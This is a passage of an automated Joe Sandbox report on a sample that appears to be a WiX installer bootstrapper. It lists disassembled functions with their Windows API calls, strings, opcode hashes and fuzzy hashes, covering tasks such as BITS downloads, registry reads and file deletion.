Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsuser.cpp
API String ID: 435350009-228655868
Opcode ID: 446a802fc742894554b1dbce09f917c022045af9ada58b12450d5268d2ddd31f
Instruction ID: ea1cb71790c89434d3defb2a4d99db90f05340aeb51dd144d5ab15c4acf03d7f
Opcode Fuzzy Hash: 446a802fc742894554b1dbce09f917c022045af9ada58b12450d5268d2ddd31f
Instruction Fuzzy Hash: BD11CA73642235B7D72057A99C09EEBBF6CFB14761F110126FE04FB181E664AD0091F4

Function 005D3C72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 005D3CC0
GetLastError.KERNEL32(?,?,00000000), ref: 005D3CCA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 005D3CFD

Strings

<, xrefs: 005D3CB2
shelutil.cpp, xrefs: 005D3CEB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$shelutil.cpp
API String ID: 3023784893-3991740012
Opcode ID: fc843d910c74079f75f29f98a27dbc830f54c4f65c10d568d361c01a088caa71
Instruction ID: dd269344f470276f0b06889ae6094ba1e735733b7d8a2ecb81748efdd514ca60
Opcode Fuzzy Hash: fc843d910c74079f75f29f98a27dbc830f54c4f65c10d568d361c01a088caa71
Instruction Fuzzy Hash: DE11E575E01229ABDB20DFA9D845A8E7BB8BF08750F00411AFD05F7340E6309A00DBA5

Function 00595F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 00595F5C
GetLastError.KERNEL32 ref: 00595F66

Strings

variable.cpp, xrefs: 00595F8A
Failed to set variant value., xrefs: 00595FAD
Failed to get computer name., xrefs: 00595F94

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: 971bd2f3933e9713d7ccd414536b8df17aaa5cd5be014afc00cda49407d9ce58
Instruction ID: cbb7c75462ec45fda63a42414da4001206524d7a3580e65764c9a4e3af72d03c
Opcode Fuzzy Hash: 971bd2f3933e9713d7ccd414536b8df17aaa5cd5be014afc00cda49407d9ce58
Instruction Fuzzy Hash: F111AC73A425299BDB2196549C05ADE7FE8BB08720F510057FD01F7280EA74AE4497E1

Function 00595E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 00595EA6

Part of subcall function 005D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00595EB2,00000000), ref: 005D0AE0
Part of subcall function 005D0ACC: GetProcAddress.KERNEL32(00000000), ref: 005D0AE7
Part of subcall function 005D0ACC: GetLastError.KERNEL32(?,?,?,00595EB2,00000000), ref: 005D0AFE

Part of subcall function 005D3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 005D3D4C

Strings

Failed to get shell folder., xrefs: 00595EDA
variable.cpp, xrefs: 00595ED0
Failed to get 64-bit folder., xrefs: 00595EF0
Failed to set variant value., xrefs: 00595F0A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: f774cca7a32e959f285931e5200c5084805ee0760cd927404a2f894a82af943e
Instruction ID: a43754874ea9059370731222ae1b03ffb8efe2ebdd963990024d4f2014a51177
Opcode Fuzzy Hash: f774cca7a32e959f285931e5200c5084805ee0760cd927404a2f894a82af943e
Instruction Fuzzy Hash: FF01A53294161AB7DF33A794CC0ABAE7E68BB00760F104153F800B6280EB719E50DB95

Function 005D4153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005D4440: FindFirstFileW.KERNEL32(005B923A,?,00000100,00000000,00000000), ref: 005D447B
Part of subcall function 005D4440: FindClose.KERNEL32(00000000), ref: 005D4487

SetFileAttributesW.KERNEL32(005B923A,00000080,00000000,005B923A,000000FF,00000000,?,?,005B923A), ref: 005D4182
GetLastError.KERNEL32(?,?,005B923A), ref: 005D418C
DeleteFileW.KERNEL32(005B923A,00000000,005B923A,000000FF,00000000,?,?,005B923A), ref: 005D41AC
GetLastError.KERNEL32(?,?,005B923A), ref: 005D41B6

Strings

fileutil.cpp, xrefs: 005D41D1

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: fb853c8a904e04a3be5fd41e8bde89426a079c3f84e3dc1c0aa5d70e3fa08a03
Instruction ID: 3ea97750408bb7f97d66fbbc3f608611f9e5f792b1851e3a72b40e7a4bc91cb0
Opcode Fuzzy Hash: fb853c8a904e04a3be5fd41e8bde89426a079c3f84e3dc1c0aa5d70e3fa08a03
Instruction Fuzzy Hash: 0B01C432A42635E7EB3146ED8D09B5B7E98BF24760F010613FD44E6390D7318D80D9D0

Function 005BDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005BDA1A
LeaveCriticalSection.KERNEL32(?), ref: 005BDA5F
SetEvent.KERNEL32(?,?,?,?), ref: 005BDA73

Strings

Failed to get state during job modification., xrefs: 005BDA33
Failure while sending progress during BITS job modification., xrefs: 005BDA4E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: 9e573fe4a404919776ef8c0bea58bbe1c9c9e6232363f25739546300f6622f64
Instruction ID: 76d265ebc89fb68e1a71e4608798e58a8023077f4bd80d342c214ffe5b285cdb
Opcode Fuzzy Hash: 9e573fe4a404919776ef8c0bea58bbe1c9c9e6232363f25739546300f6622f64
Instruction Fuzzy Hash: 8101D236605629FBDB11DB55C848AAEBBB8FF14321B00420AE904D3640E730B904D6E0

Function 005BDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,005BDDEE), ref: 005BDC92
LeaveCriticalSection.KERNEL32(00000008,?,005BDDEE), ref: 005BDCD7
SetEvent.KERNEL32(?,?,005BDDEE), ref: 005BDCEB

Strings

Failure while sending progress., xrefs: 005BDCC6
Failed to get BITS job state., xrefs: 005BDCAB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: b7a781a368e8348d4723575b25d304ba36e6192edfef32aa91bbedb3de157622
Instruction ID: 900eb3a83e524fbbd032591ae270cc95e890a349f7b51de5f23a20628aeb9879
Opcode Fuzzy Hash: b7a781a368e8348d4723575b25d304ba36e6192edfef32aa91bbedb3de157622
Instruction Fuzzy Hash: 6701B572601A29EBC7219B55D8499EAFFB9FF14320B01415AF905D3650EB70BD04D7E4

Function 005BD7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,005BDF52,?,?,?,?,?,?,00000000,00000000), ref: 005BD802
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,005BDF52,?,?,?,?,?,?,00000000,00000000), ref: 005BD80D
GetLastError.KERNEL32(?,005BDF52,?,?,?,?,?,?,00000000,00000000), ref: 005BD81A

Strings

Failed to create BITS job complete event., xrefs: 005BD848
bitsuser.cpp, xrefs: 005BD83E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsuser.cpp
API String ID: 3069647169-3441864216
Opcode ID: 9aba6e090c774ba4637428ba5f7c707eeef73e4efb6279d86ed96c569ccb477f
Instruction ID: 48322a831a6277721d9120537355a617f176fe20d6420d20c090c789ceeb046c
Opcode Fuzzy Hash: 9aba6e090c774ba4637428ba5f7c707eeef73e4efb6279d86ed96c569ccb477f
Instruction Fuzzy Hash: 8D018D76542636ABD7209F55D805696BFA8FF49B71B014117FD08D7641E770E400CBF4

Function 0059D4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,005A7040,000000B8,00000000,?,00000000,7694B390), ref: 0059D4B7
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0059D4C6
LeaveCriticalSection.KERNEL32(000000D0,?,005A7040,000000B8,00000000,?,00000000,7694B390), ref: 0059D4DB

Strings

userexperience.cpp, xrefs: 0059D4F4
user active cannot be changed because it was already in that state., xrefs: 0059D4FE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: user active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 0f4aaf5a074fbc83385933179efd05466f551f8225a81831ab25f7c47ad7b79a
Instruction ID: b183816da769a314e9c56a11ec9f80437a4c883a722ba75a71caab87dd00a2de
Opcode Fuzzy Hash: 0f4aaf5a074fbc83385933179efd05466f551f8225a81831ab25f7c47ad7b79a
Instruction Fuzzy Hash: 44F0AF36300209AF9B209EEADC88D97BBBDFB95761701442BF506D3280DB70E9098770

Function 005D1C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 005D1CB3
GetLastError.KERNEL32(?,005949DA,00000001,?,?,00594551,?,?,?,?,00595466,?,?,?,?), ref: 005D1CC2

Strings

srclient.dll, xrefs: 005D1C91
SRSetRestorePointW, xrefs: 005D1CA8
srputil.cpp, xrefs: 005D1CE3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: e38242d59070e68cbebfb6cf17c4f0ff84628ec0abb505cd1e548a631be58c32
Instruction ID: de1ba87ab6c66e4f9a0ec2b47fd7bdb095d89aab421b55fd04a6f3bf9d79f178
Opcode Fuzzy Hash: e38242d59070e68cbebfb6cf17c4f0ff84628ec0abb505cd1e548a631be58c32
Instruction Fuzzy Hash: 21016236AD2A36B7D73126AD9C09B666D457B107A1F010123EE01EB360D725DC80E7DD

Function 005C495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005C490E,00000000,?,005C48AE,00000000,005F7F08,0000000C,005C4A05,00000000,00000002), ref: 005C497D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005C4990
FreeLibrary.KERNEL32(00000000,?,?,?,005C490E,00000000,?,005C48AE,00000000,005F7F08,0000000C,005C4A05,00000000,00000002), ref: 005C49B3

Strings

mscoree.dll, xrefs: 005C4976
CorExitProcess, xrefs: 005C4988

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 29e83bdb4a0cff80b159a37a88063ded2544fd28da030a65cec8909bf700c699
Instruction ID: 8c7f7c748a53bc294f1c86420d2f4eead5f0cafaeace3e19ca6f9fd2aff1d627
Opcode Fuzzy Hash: 29e83bdb4a0cff80b159a37a88063ded2544fd28da030a65cec8909bf700c699
Instruction Fuzzy Hash: 08F0AF30A0121CFFDB209F90DC29FAEBFB9FB14711F01406AF905A2150CB754944DA95

Function 005921AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 005921F2
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 005921FE

Part of subcall function 00593BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BDB
Part of subcall function 00593BD3: HeapSize.KERNEL32(00000000,?,005921CC,000001C7,80004005,8007139F,?,?,005D0267,8007139F,?,00000000,00000000,8007139F), ref: 00593BE2

Strings

strutil.cpp, xrefs: 00592222

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: dc501e51473bbbcf9e6ca08448095b1c09030af5bbe6d0a362a566f11d160a8c
Instruction ID: bedd4e4a1241cb1bf95740d49b867b9c19e495541c648c9fbe50ab807fc81722
Opcode Fuzzy Hash: dc501e51473bbbcf9e6ca08448095b1c09030af5bbe6d0a362a566f11d160a8c
Instruction Fuzzy Hash: 1431E53A601226BBDF209FA5CC48A6A3F99BF55764F210225FD159B290EB71DC40D7D0

Function 005D94FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 005D95D5
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 005D9610
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 005D962C
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 005D9639
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 005D9646

Part of subcall function 005D0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,005D95C2,00000001), ref: 005D0FED

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: c7f46eb53ffc343d0b0b2d30b8bc9df87a8ac093ae54330c5b5ac4b5232bede4
Instruction ID: 82616f3b036f75f8f27270ab3db5b4eb3d8947efcabe8d7774caaa19ef913657
Opcode Fuzzy Hash: c7f46eb53ffc343d0b0b2d30b8bc9df87a8ac093ae54330c5b5ac4b5232bede4
Instruction Fuzzy Hash: 35410872C0122EBBCF31AF9889859ADFEB9FF14750F11416BA91476221D7318E50EB90

Function 00598A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00598BC8,0059972D,?,0059972D,?,?,0059972D,?,?), ref: 00598A27
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00598BC8,0059972D,?,0059972D,?,?,0059972D,?,?), ref: 00598A2F
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00598BC8,0059972D,?,0059972D,?), ref: 00598A7E
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00598BC8,0059972D,?,0059972D,?), ref: 00598AE0
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00598BC8,0059972D,?,0059972D,?), ref: 00598B0D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: ad9466aafd405df4479c837abbb0d5b637fc36860aba5ad5507061836883fa72
Instruction ID: 4111ef0ebcd11df1c7032ec107eb67208c35451a230076b6f3738571440f5071
Opcode Fuzzy Hash: ad9466aafd405df4479c837abbb0d5b637fc36860aba5ad5507061836883fa72
Instruction Fuzzy Hash: E1316472A01119FFCF218F58CC89ABE3F6AFB4A360F154417F91987210CA719D90DBA0

Function 005974B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005953BD,WixBundleOriginalSource,?,?,005AA623,840F01E8,WixBundleOriginalSource,?,005FAA90,?,00000000,00595445,00000001,?,?,ETY), ref: 005974C3
LeaveCriticalSection.KERNEL32(005953BD,005953BD,00000000,00000000,?,?,005AA623,840F01E8,WixBundleOriginalSource,?,005FAA90,?,00000000,00595445,00000001,?), ref: 0059752A

Strings

Failed to get value as string for variable: %ls, xrefs: 00597519
Failed to get value of variable: %ls, xrefs: 005974FD
WixBundleOriginalSource, xrefs: 005974BF

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 021afc73362a82abf574c0b68d0d0d6a8561d8450867338dc1b68b90c493814b
Instruction ID: f2d0b01a266679275f616f5250b68e86260f7d2e5a3445c0566d6e9c0f675947
Opcode Fuzzy Hash: 021afc73362a82abf574c0b68d0d0d6a8561d8450867338dc1b68b90c493814b
Instruction Fuzzy Hash: CA015A3295512EEBCF229E94CC09A9E7F65FF18761F128167FD04AA221C7369E10E7D0

Function 005BD152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,005BD148,00000000), ref: 005BD16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005BD148,00000000), ref: 005BD179
CloseHandle.KERNEL32(005DB518,00000000,?,00000000,?,005BD148,00000000), ref: 005BD186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,005BD148,00000000), ref: 005BD193
UnmapViewOfFile.KERNEL32(005DB4E8,00000000,?,005BD148,00000000), ref: 005BD1A2

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: b461526c071c63b8810e2b8cd6f0232bc8267279f97dd7319f260daa9e382c83
Instruction ID: 089908ab595e38674bddef49094b94a6f9af7a3cd9a55bdeebdb88e10dfa2f9a
Opcode Fuzzy Hash: b461526c071c63b8810e2b8cd6f0232bc8267279f97dd7319f260daa9e382c83
Instruction Fuzzy Hash: B701E476401B16DFCB31AFAAD980856FBF9BF60711315C93EE1A652920D371B880DF60

Function 005D8713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 005D8820
GetLastError.KERNEL32 ref: 005D882A

Strings

clbcatq.dll, xrefs: 005D8731, 005D873C
timeutil.cpp, xrefs: 005D884E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
